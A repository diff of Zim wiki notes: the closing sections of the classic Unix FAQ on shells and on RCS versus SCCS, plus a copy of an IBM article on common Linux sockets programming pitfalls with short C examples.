corrections for any of these answers, please send them to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: Can shells be classified into categories?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
|
||||
5.1) Can shells be classified into categories?
|
||||
|
||||
In general there are two main classes of shells. The first class
|
||||
are those shells derived from the Bourne shell, which include sh,
|
||||
ksh, bash, and zsh. The second class are those shells derived
|
||||
from C shell and include csh and tcsh. In addition there is rc
|
||||
which most people consider to be in a "class by itself" although
|
||||
some people might argue that rc belongs in the Bourne shell class.
|
||||
|
||||
With the classification above, using care, it is possible to
|
||||
write scripts that will work for all the shells from the Bourne
|
||||
shell category, and write other scripts that will work for all of
|
||||
the shells from the C shell category.
|
||||
|
||||
|
||||
|
||||
Subject: How do I "include" one shell script from within another shell script?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.2) How do I "include" one shell script from within another shell script?
|
||||
|
||||
All of the shells from the Bourne shell category (including rc)
|
||||
use the "." command. All of the shells from the C shell category
|
||||
use "source".
|
||||
|
||||
|
||||
|
||||
Subject: Do all shells have aliases? Is there something else that can be used?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.3) Do all shells have aliases? Is there something else that can be used?
|
||||
|
||||
All of the major shells other than sh have aliases, but they
|
||||
don't all work the same way. For example, some don't accept
|
||||
arguments.
|
||||
|
||||
Although not strictly equivalent, shell functions (which exist in
|
||||
most shells from the Bourne shell category) have almost the same
|
||||
functionality as aliases. Shell functions can do things that
|
||||
aliases can't do. Shell functions did not exist in Bourne shells
|
||||
derived from Version 7 Unix, which includes System III and BSD 4.2.
|
||||
BSD 4.3 and System V shells do support shell functions.
|
||||
|
||||
Use unalias to remove aliases and unset to remove functions.
|
||||
|
||||
|
||||
|
||||
Subject: How are shell variables assigned?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.4) How are shell variables assigned?
|
||||
|
||||
The shells from the C shell category use "set variable=value" for
|
||||
variables local to the shell and "setenv variable value" for
|
||||
environment variables. To get rid of variables in these shells
|
||||
use unset and unsetenv. The shells from the Bourne shell
|
||||
category use "variable=value" and may require an "export
|
||||
VARIABLE_NAME" to place the variable into the environment. To
|
||||
get rid of the variables use unset.
|
||||
|
||||
|
||||
|
||||
Subject: How can I tell if I am running an interactive shell?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
>From: dws@ssec.wisc.edu (DaviD W. Sanderson)
|
||||
Date: Fri, 23 Oct 92 11:59:19 -0600
|
||||
|
||||
5.5) How can I tell if I am running an interactive shell?
|
||||
|
||||
In the C shell category, look for the variable $prompt.
|
||||
|
||||
In the Bourne shell category, you can look for the variable $PS1,
|
||||
however, it is better to check the variable $-. If $- contains
|
||||
an 'i', the shell is interactive. Test like so:
|
||||
|
||||
case $- in
|
||||
*i*) # do things for interactive shell
|
||||
;;
|
||||
*) # do things for non-interactive shell
|
||||
;;
|
||||
esac
|
||||
|
||||
|
||||
|
||||
Subject: What "dot" files do the various shells use?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
>From: tmb@idiap.ch (Thomas M. Breuel)
|
||||
Date: Wed, 28 Oct 92 03:30:36 +0100
|
||||
|
||||
5.6) What "dot" files do the various shells use?
|
||||
|
||||
Although this may not be a complete listing, this provides the
|
||||
majority of information.
|
||||
|
||||
csh
|
||||
Some versions have system-wide .cshrc and .login files. Every
|
||||
version puts them in different places.
|
||||
|
||||
Start-up (in this order):
|
||||
.cshrc - always; unless the -f option is used.
|
||||
.login - login shells.
|
||||
|
||||
Upon termination:
|
||||
.logout - login shells.
|
||||
|
||||
Others:
|
||||
.history - saves the history (based on $savehist).
|
||||
|
||||
tcsh
|
||||
Start-up (in this order):
|
||||
/etc/csh.cshrc - always.
|
||||
/etc/csh.login - login shells.
|
||||
.tcshrc - always.
|
||||
.cshrc - if no .tcshrc was present.
|
||||
.login - login shells
|
||||
|
||||
Upon termination:
|
||||
.logout - login shells.
|
||||
|
||||
Others:
|
||||
.history - saves the history (based on $savehist).
|
||||
.cshdirs - saves the directory stack.
|
||||
|
||||
sh
|
||||
Start-up (in this order):
|
||||
/etc/profile - login shells.
|
||||
.profile - login shells.
|
||||
|
||||
Upon termination:
|
||||
any command (or script) specified using the command:
|
||||
trap "command" 0
|
||||
|
||||
ksh
|
||||
Start-up (in this order):
|
||||
/etc/profile - login shells.
|
||||
.profile - login shells; unless the -p option is used.
|
||||
$ENV - always, if it is set; unless the -p option is used.
|
||||
/etc/suid_profile - when the -p option is used.
|
||||
|
||||
Upon termination:
|
||||
any command (or script) specified using the command:
|
||||
trap "command" 0
|
||||
|
||||
bash
|
||||
Start-up (in this order):
|
||||
/etc/profile - login shells.
|
||||
.bash_profile - login shells.
|
||||
.profile - login if no .bash_profile is present.
|
||||
.bashrc - interactive non-login shells.
|
||||
$ENV - always, if it is set.
|
||||
|
||||
Upon termination:
|
||||
.bash_logout - login shells.
|
||||
|
||||
Others:
|
||||
.inputrc - Readline initialization.
|
||||
|
||||
zsh
|
||||
Start-up (in this order):
|
||||
.zshenv - always, unless -f is specified.
|
||||
.zprofile - login shells.
|
||||
.zshrc - interactive shells, unless -f is specified.
|
||||
.zlogin - login shells.
|
||||
|
||||
Upon termination:
|
||||
.zlogout - login shells.
|
||||
|
||||
rc
|
||||
Start-up:
|
||||
.rcrc - login shells
|
||||
|
||||
|
||||
|
||||
Subject: I would like to know more about the differences ... ?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.7) I would like to know more about the differences between the
|
||||
various shells. Is this information available some place?
|
||||
|
||||
A very detailed comparison of sh, csh, tcsh, ksh, bash, zsh, and
|
||||
rc is available via anon. ftp in several places:
|
||||
|
||||
ftp.uwp.edu (204.95.162.190):pub/vi/docs/shell-100.BetaA.Z
|
||||
utsun.s.u-tokyo.ac.jp:misc/vi-archive/docs/shell-100.BetaA.Z
|
||||
|
||||
This file compares the flags, the programming syntax,
|
||||
input/output redirection, and parameters/shell environment
|
||||
variables. It doesn't discuss what dot files are used and the
|
||||
inheritance for environment variables and functions.
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 5 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,368 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:10:33+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (7-7) ======
|
||||
Created Tuesday 07 June 2011
|
||||
Message-ID: <unix-faq/faq/part7_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (7/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:50:01 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part7
|
||||
Version: $Id: part7,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) A comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
7.1) RCS vs SCCS: Introduction
|
||||
7.2) RCS vs SCCS: How do the interfaces compare?
|
||||
7.3) RCS vs SCCS: What's in a Revision File?
|
||||
7.4) RCS vs SCCS: What are the keywords?
|
||||
7.5) What's an RCS symbolic name?
|
||||
7.6) RCS vs SCCS: How do they compare for performance?
|
||||
7.7) RCS vs SCCS: Version Identification.
|
||||
7.8) RCS vs SCCS: How do they handle problems?
|
||||
7.9) RCS vs SCCS: How do they interact with make(1)?
|
||||
7.10) RCS vs SCCS: Conversion
|
||||
7.11) RCS vs SCCS: Support
|
||||
7.12) RCS vs SCCS: Command Comparison
|
||||
7.13) RCS vs SCCS: Acknowledgements
|
||||
7.14) Can I get more information on configuration management systems?
|
||||
|
||||
If you're looking for the answer to, say, question 7.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^7.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Introduction
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.1) RCS vs SCCS: Introduction
|
||||
|
||||
The majority of the replies (in a recent poll) were in favor of
|
||||
RCS, a few for SCCS, and a few suggested alternatives such as CVS.
|
||||
|
||||
Functionally RCS and SCCS are practically equal, with RCS having
|
||||
a few more features since it continues to be updated.
|
||||
|
||||
Note that RCS learned from the mistakes of SCCS...
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do the interfaces compare?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.2) RCS vs SCCS: How do the interfaces compare?
|
||||
|
||||
RCS has an easier interface for first time users. There are fewer
|
||||
commands, it is more intuitive and consistent, and it provides
|
||||
more useful arguments.
|
||||
|
||||
Branches have to be specifically created in SCCS. In RCS, they
|
||||
are checked in as any other version.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: What's in a Revision File?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.3) RCS vs SCCS: What's in a Revision File?
|
||||
|
||||
RCS keeps history in files with a ",v" suffix. SCCS keeps
|
||||
history in files with a "s." prefix.
|
||||
|
||||
RCS looks for RCS files automatically in the current directory or
|
||||
in a RCS subdirectory, or you can specify an alternate RCS file.
|
||||
The sccs front end to SCCS always uses the SCCS directory. If
|
||||
you don't use the sccs front end, you must specify the full SCCS
|
||||
filename.
|
||||
|
||||
RCS stores its revisions by holding a copy of the latest version
|
||||
and storing backward deltas. SCCS uses a "merged delta"
|
||||
concept.
|
||||
|
||||
All RCS activity takes place within a single RCS file. SCCS
|
||||
maintains several files. This can be messy and confusing.
|
||||
|
||||
Editing either RCS or SCCS files is a bad idea because mistakes
|
||||
are so easy to make and so fatal to the history of the file.
|
||||
Revision information is easy to edit in both types, whereas one
|
||||
would not want to edit the actual text of a version in RCS. If
|
||||
you edit an SCCS file, you will have to recalculate the checksum
|
||||
using the admin program.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: What are the keywords?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.4) RCS vs SCCS: What are the keywords?
|
||||
|
||||
RCS and SCCS use different keywords that are expanded in the
|
||||
text. For SCCS the keyword "%I%" is replaced with the revision
|
||||
number if the file is checked out for reading.
|
||||
|
||||
The RCS keywords are easier to remember, but keyword expansion is
|
||||
more easily customized in SCCS.
|
||||
|
||||
In SCCS, keywords are expanded on a read-only get. If a version
|
||||
with expanded keywords is copied into a file that will be
|
||||
deltaed, the keywords will be lost and the version information in
|
||||
the file will not be updated. On the other hand, RCS retains the
|
||||
keywords when they are expanded so this is avoided.
|
||||
|
||||
|
||||
|
||||
Subject: What's an RCS symbolic name?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.5) What's an RCS symbolic name?
|
||||
|
||||
RCS allows you to treat a set of files as a family of files while
|
||||
SCCS is meant primarily for keeping the revision history of
|
||||
files.
|
||||
|
||||
RCS accomplishes that with symbolic names: you can mark all the
|
||||
source files associated with an application version with `rcs
|
||||
-n', and then easily retrieve them later as a cohesive unit. In
|
||||
SCCS you would have to do this by writing a script to write or
|
||||
read all file names and versions to or from a file.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do they compare for performance?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.6) RCS vs SCCS: How do they compare for performance?
|
||||
|
||||
Since RCS stores the latest version in full, it is much faster in
|
||||
retrieving the latest version. After RCS version 5.6, it is also
|
||||
faster than SCCS in retrieving older versions.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Version Identification.
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.7) RCS vs SCCS: Version Identification.
|
||||
|
||||
SCCS is able to determine when a specific line of code was added
|
||||
to a system.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do they handle problems?
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.8) RCS vs SCCS: How do they handle problems?
|
||||
|
||||
If you are missing the sccs or rcs tools, or the RCS or SCCS file
|
||||
is corrupt and the tools don't work on it, you can still retrieve
|
||||
the latest version in RCS. Not true with SCCS.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: How do they interact with make(1)?
|
||||
Date: Wed, 30 Dec 1992 10:41:51 -0700
|
||||
>From: Blair P. Houghton <bhoughto@sedona.intel.com>
|
||||
|
||||
7.9) RCS vs SCCS: How do they interact with make(1)?
|
||||
|
||||
The fact that SCCS uses prefixes (s.file.c) means that make(1)
|
||||
can't treat them in an ordinary manner, and special rules
|
||||
(involving '~' characters) must be used in order for make(1) to
|
||||
work with SCCS; even so, make(1) on some UNIX platforms will not
|
||||
apply default rules to files that are being managed with SCCS.
|
||||
The suffix notation (file.c,v) for RCS means that ordinary
|
||||
suffix-rules can be used in all implementations of make(1), even
|
||||
if the implementation isn't designed to handle RCS files
|
||||
specially.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Conversion.
|
||||
Date: Tue, 10 Jan 1995 21:01:41 -0500
|
||||
>From: Ed Ravin <elr@wp.prodigy.com>
|
||||
|
||||
7.10) RCS vs SCCS: Conversion.
|
||||
|
||||
An unsupported C-Shell script is available to convert from SCCS
|
||||
to RCS. You can find it in
|
||||
|
||||
ftp://ftp.std.com/src/gnu/cvs-1.3/contrib/
|
||||
|
||||
One would have to write their own script or program to convert
|
||||
from RCS to SCCS.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Support
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.11) RCS vs SCCS: Support
|
||||
|
||||
SCCS is supported by AT&T. RCS is supported by the Free Software
|
||||
Foundation. Therefore RCS runs on many more platforms, including
|
||||
PCs.
|
||||
|
||||
Most make programs recognize SCCS's "s." prefix while GNU make
|
||||
is one of the few that handles RCS's ",v" suffix.
|
||||
|
||||
Some tar programs have a -F option that ignores either RCS
|
||||
directories, or SCCS directories or both.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Command Comparison
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.12) RCS vs SCCS: Command Comparison
|
||||
|
||||
SCCS                        RCS                   Explanation
====                        ===                   ===========

sccs admin -i -nfile file   ci file               Checks in the file for the first time,
                                                  creating the revision history file.

sccs get file               co file               Check out a file for reading.

sccs edit file              co -l file            Check out a file for modification.

sccs delta file             ci file               Check in a file previously locked.

what file                   ident file            Print keyword information.

sccs prs file               rlog file             Print a history of the file.

sccs sccsdiff -rx -ry file  rcsdiff -rx -ry file  Compare two revisions.

sccs diffs file             rcsdiff file          Compare current with last revision.

sccs edit -ix-y file        rcsmerge -rx-y file   Merge changes between two versions
                                                  into file.

???                         rcs -l file           Lock the latest revision.

???                         rcs -u file           Unlock the latest revision. Possible
                                                  to break another's lock, but mail is
                                                  sent to the other user explaining why.
|
||||
|
||||
|
||||
|
||||
Subject: RCS vs SCCS: Acknowledgements
|
||||
Date: Sat, 10 Oct 92 19:34:39 +0200
|
||||
>From: Bill Wohler <wohler@newt.com>
|
||||
|
||||
7.13) RCS vs SCCS: Acknowledgements
|
||||
|
||||
I would like to thank the following persons for contributing to
|
||||
these articles. I'd like to add your name to the list--please
|
||||
send comments or more references to Bill Wohler <wohler@newt.com>.
|
||||
|
||||
Karl Vogel <vogel@c-17igp.wpafb.af.mil>
|
||||
Mark Runyan <runyan@hpcuhc.cup.hp.com>
|
||||
Paul Eggert <eggert@twinsun.com>
|
||||
Greg Henderson <henders@infonode.ingr.com>
|
||||
Dave Goldberg <dsg@mbunix.mitre.org>
|
||||
Rob Kurver <rob@pact.nl>
|
||||
Raymond Chen <rjc@math.princeton.edu>
|
||||
Dwight <dwight@s1.gov>
|
||||
|
||||
|
||||
|
||||
Subject: Can I get more information on configuration management systems?
|
||||
Date: Thu Oct 15 10:27:47 EDT 1992
|
||||
>From: Ted Timar <tmatimar@isgtec.com>
|
||||
|
||||
7.14) Can I get more information on configuration management systems?
|
||||
|
||||
Bill Wohler, who compiled all of the information in this part of
|
||||
the FAQ, has compiled much more information. This information is
|
||||
available for ftp from ftp.wg.omron.co.jp (133.210.4.4) under
|
||||
"pub/unix-faq/docs/rev-ctl-sys".
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 7 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
3715
Zim/Programme/APUE/FAQ/Unix_Programming_FAQ_(v1.37).txt
Normal file
@@ -0,0 +1,263 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T22:53:56+08:00
|
||||
|
||||
====== Five pitfalls of Linux sockets programming ======
|
||||
Created Saturday 04 June 2011
|
||||
http://www.ibm.com/developerworks/linux/library/l-sockpit/
|
||||
First introduced into the 4.2 BSD UNIX® operating system, the Sockets API is now a standard feature of any operating system. In fact, it's hard to find a modern language that doesn't support the Sockets API. The API is a relatively simple one, but new developers can still run into a few common pitfalls.
|
||||
|
||||
This article identifies those pitfalls and shows you how to avoid them.
|
||||
|
||||
Pitfall 1. Ignoring return status
|
||||
|
||||
The first pitfall is an obvious one, but it's an error that new developers make most often. If you ignore the return status of functions, you may miss when they fail or partially succeed. This, in turn, can propagate the error, making it difficult to locate the source of the problem.
|
||||
|
||||
Instead of ignoring status returns, capture and check each and every one. Consider the example of a socket send function shown in Listing 1.
|
||||
|
||||
Listing 1. Ignoring API function status return
|
||||
|
||||
int status, sock, mode;
|
||||
|
||||
/* Create a new stream (TCP) socket */
|
||||
sock = socket( AF_INET, SOCK_STREAM, 0 );
|
||||
|
||||
...
|
||||
|
||||
status = send( sock, buffer, buflen, MSG_DONTWAIT );
|
||||
|
||||
if (status == -1) {
|
||||
|
||||
/* send failed */
|
||||
printf( "send failed: %s\n", strerror(errno) );
|
||||
|
||||
} else {
|
||||
|
||||
/* send succeeded -- or did it? */
|
||||
|
||||
}
|
||||
|
||||
|
||||
Listing 1 explores a function snippet that performs a socket send (sending data through a socket). The error status of the function is captured and tested, but this example ignores a feature of send in non-blocking mode (enabled by the MSG_DONTWAIT flag).
|
||||
|
||||
Three classes of return values are possible from the send API function:
|
||||
|
||||
If all of the data has been successfully queued for transmission, the number of bytes requested is returned.
|
||||
If a failure has occurred, a -1 is returned (and that failure can be understood through the use of the errno variable).
|
||||
If only some of the data could be queued in the call, the return value is the number of bytes actually queued, which is less than the number requested.
|
||||
|
||||
Because of the non-blocking nature of the MSG_DONTWAIT variant of send, the call returns after sending all, some, or none of the data. Ignoring the return status here would result in an incomplete send and subsequent loss of data.
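One way to avoid losing data on a partial send is to loop until everything has been queued. The following is only a minimal sketch: send_all is a hypothetical helper name, and it assumes a blocking socket (flags of 0). With MSG_DONTWAIT you would also have to handle EAGAIN/EWOULDBLOCK, for example by waiting until the socket is writable again.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Hypothetical helper (not part of the Sockets API): keep calling
 * send() until all len bytes have been queued.
 * Returns 0 on success, -1 on error (errno is set by send()). */
int send_all( int sock, const void *buf, size_t len )
{
  const char *p = buf;
  size_t left = len;

  while (left > 0) {

    ssize_t n = send( sock, p, left, 0 );

    if (n == -1) {
      if (errno == EINTR) continue;   /* interrupted by a signal, retry */
      return -1;                      /* real failure */
    }

    p += n;                           /* partial send: skip what was queued */
    left -= (size_t)n;

  }

  return 0;
}
```

A caller then checks one status value, for example if (send_all( sock, buffer, buflen ) == -1), instead of assuming that a single send call queued the whole buffer.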
|
||||
|
||||
|
||||
Pitfall 2. Peer socket closure
|
||||
|
||||
One of the interesting aspects of UNIX is that you can view almost everything as a file. Files themselves, directories, pipes, devices, and sockets are treated as files. This is a novel abstraction and means that a collective set of APIs can be used over a wide range of device types.
|
||||
|
||||
Consider the read API function, which reads some number of bytes from a file. The read function returns the number of bytes read (up to the maximum that you specify), -1 on error, or zero if the end of the file has been reached.
|
||||
|
||||
If you read from a file and reach the end (indicated by a zero-length read), you'd close the file and be done. The same thing applies to a socket, but the semantics are a little different. If you perform a read on a socket and get a zero return, this indicates that the peer at the remote end of the socket has called the close API function. The indication is the same as the file read -- no more data can be read through the descriptor (see Listing 2).
|
||||
|
||||
Listing 2. Proper handling of the read API function return value
|
||||
|
||||
int sock, status;
|
||||
|
||||
sock = socket( AF_INET, SOCK_STREAM, 0 );
|
||||
|
||||
...
|
||||
|
||||
status = read( sock, buffer, buflen );
|
||||
|
||||
if (status > 0) {
|
||||
|
||||
/* Data read from the socket */
|
||||
|
||||
} else if (status == -1) {
|
||||
|
||||
/* Error, check errno, take action... */
|
||||
|
||||
} else if (status == 0) {
|
||||
|
||||
/* Peer closed the socket, finish the close */
|
||||
close( sock );
|
||||
|
||||
/* Further processing... */
|
||||
|
||||
}
|
||||
|
||||
|
||||
The closure of a peer socket can also be detected with the write API function. In this case, you'll receive a SIGPIPE signal or, if this signal is ignored or blocked, the write function will return a -1 and set errno to EPIPE.
|
||||
|
||||
|
||||
Pitfall 3. Address in use error (EADDRINUSE)
|
||||
|
||||
You can use the bind API function to bind an address (an interface and a port) to a socket endpoint. You can use this function in a server setting to restrict the interfaces from which incoming connections are possible. You can also use this function from a client setting to restrict the interface that should be used for an outgoing connection. The most common use of bind is to associate a port number with a server and use the wildcard address (INADDR_ANY), which allows any interface to be used for incoming connections.
|
||||
|
||||
The problem commonly encountered with bind is attempting to bind a port that's already in use. The pitfall is that no active socket may exist, but binding to the port is still disallowed (bind returns -1 with errno set to EADDRINUSE), which is caused by the TCP socket TIME_WAIT state. This state keeps a socket around for two to four minutes after its close. After the TIME_WAIT state has exited, the socket is removed, and the address can be rebound without issue.
|
||||
|
||||
Waiting for TIME_WAIT to finish can be annoying, especially if you're developing a socket server and you need to stop the server to make changes and then restart it. Luckily, there's a way to get around the TIME_WAIT state. You can apply the SO_REUSEADDR socket option to the socket, such that the port can be reused immediately.
|
||||
|
||||
Consider the example in Listing 3. Prior to binding an address, I call setsockopt with the SO_REUSEADDR option. To enable address reuse, I set the integer argument (on) to 1 (otherwise, you can set it to 0 to disable address reuse).
|
||||
|
||||
Listing 3. Avoiding the "Address In Use" error using the SO_REUSEADDR socket option
|
||||
|
||||
int sock, ret, on;
struct sockaddr_in servaddr;

/* Create a new stream (TCP) socket */
sock = socket( AF_INET, SOCK_STREAM, 0 );

/* Enable address reuse */
on = 1;
ret = setsockopt( sock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on) );

/* Allow connections to port 45000 from any available interface */
memset( &servaddr, 0, sizeof(servaddr) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl( INADDR_ANY );
servaddr.sin_port = htons( 45000 );

/* Bind to the address (interface/port) */
ret = bind( sock, (struct sockaddr *)&servaddr, sizeof(servaddr) );
|
||||
|
||||
|
||||
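With the SO_REUSEADDR socket option applied before the call, bind no longer fails with EADDRINUSE just because an earlier socket on the same address is still in the TIME_WAIT state. The call can still fail if another socket is actively listening on that address.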
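The same steps can be wrapped in a function with error checking. This is a sketch under assumptions: the name make_listener and the backlog of 5 are illustrative choices, not part of the original listing.

```c
#include <errno.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Hypothetical helper: create a TCP socket listening on the given port on
 * all interfaces, with SO_REUSEADDR set before bind(). Returns the socket
 * descriptor, or -1 on failure with errno set by the failing call. */
int make_listener(uint16_t port)
{
    struct sockaddr_in addr;
    int on = 1;
    int saved;
    int sock = socket(AF_INET, SOCK_STREAM, 0);

    if (sock < 0)
        return -1;

    /* The option has to be set before bind() to affect it. */
    if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0)
        goto fail;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(port);

    if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        goto fail;
    if (listen(sock, 5) < 0)   /* backlog of 5 is an arbitrary choice */
        goto fail;
    return sock;

fail:
    saved = errno;             /* close() may overwrite errno */
    close(sock);
    errno = saved;
    return -1;
}
```

Calling make_listener(45000) reproduces Listing 3; passing 0 lets the kernel pick a free port, which is convenient in tests.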
|
||||
|
||||
|
||||
|
||||
Pitfall 4. Sending structured data
|
||||
|
||||
Sockets are a perfect vehicle for sending unstructured byte-streams or ASCII streams of data (such as HTML pages over HTTP, or e-mail over SMTP). But if you try to send structured binary data over a socket, it becomes much more complicated.
|
||||
|
||||
Let's say you want to send an integer through a socket: can you be certain that the receiver will interpret the integer in the same way? Applications running on similar architectures can rely on their common platforms to interpret the type identically. But what happens if a client running on a big endian IBM PowerPC attempts to send a 32-bit integer to a little endian Intel x86? Byte ordering will cause the value to be interpreted incorrectly.
|
||||
To byte-swap or not?
|
||||
|
||||
Endianness refers to the byte ordering in memory. Big endian orders by most-significant byte first, whereas little endian orders by least-significant byte first.
|
||||
|
||||
Big endian architectures, such as the PowerPC®, have an advantage over little endian architectures such as the Intel® Pentium® series in that network byte order is big endian. This means that control data within the TCP/IP stack is naturally in order for big endian machines. Little endian architectures require byte-swapping -- a slight performance disadvantage for networked applications.
|
||||
|
||||
What about sending a C structure through a socket? You can run into trouble here as well, because not all compilers align the elements of a structure in the same way. The structure could also be packed to minimize wasted space, further misaligning the elements in the structure.
|
||||
|
||||
Fortunately, there are solutions to this problem that ensure consistent interpretation of data by both endpoints. In the old days, the Remote Procedure Call (RPC) toolkit provided what was called External Data Representation (XDR). XDR defined a standard representation for data to support the development of communicating heterogeneous network applications.
|
||||
|
||||
Today, a couple of newer protocols provide a similar capability. The XML Remote Procedure Call protocol (XML-RPC) marshals procedure calls over HTTP in an XML format. Data and metadata are encoded within XML and transported as ASCII strings, which decouples the values from their physical representation on the host architecture. SOAP followed XML-RPC and extends its ideas with more features and functionality. See the Resources section for more information on each of these protocols.
